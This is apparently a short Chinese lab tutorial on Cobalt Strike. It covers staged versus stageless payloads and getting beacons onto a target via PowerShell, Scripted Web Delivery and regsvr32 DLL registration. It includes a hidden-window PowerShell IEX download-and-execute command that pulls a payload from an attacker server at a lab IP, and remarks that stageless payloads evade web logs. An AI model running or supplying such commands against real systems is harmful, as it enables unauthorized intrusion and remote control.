Cobalt Strike基础
Staged(有阶段)
在有阶段的执行方式中,分为Stager和Stage两个阶段
- Stager(初始执行载荷):
定义:Stager是Stage 1,是一个较小的、轻量级的初始执行载荷
作用:与服务端建立初始连接,并从服务器下载更大的Payload,也就是Stage2
-
Stage(更大、完整的执行载荷):
定义:Stage是Stage 2,是一个更大、更完整的执行载荷。
作用:一旦Stager与服务端建立连接,Stager会请求下载Stage
Staged上线会有web日志
Stageless(无阶段)
整个Payload在一次性过程中直接执行,跟服务端交互少,更难被检测,但也会限制Payload的大小,因为只能在一次连接中传输
stageless上线没有web日志
两者大小也不一样,前者是Staged,后者是Stageless
powershell command上线
选择对应的监听器,选择PowerShell Command命令
复制payload,到靶机中
执行powershell命令
成功上线
Scripted Web Delivery (S)上线
配置路径,端口,监听器
点击运行
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.20.128:8086/abc'))"本质也是通过powershell远程加载上线,只是这次是攻击者在cs服务器开启了一个web站点,然后靶机中运行命令去请求该站点,响应的内容作为powershell要执行的命令,属于payload远程加载执行的一种方式
在靶机运行命令
成功上线
DLL文件上线
选择监听器,选择dll
将dll文件上传到靶机,然后在靶机注册dll文件上线
regsvr32 artifact.dll
上线成功
补充
在windows中,.exe,.dll,.com都是可执行文件
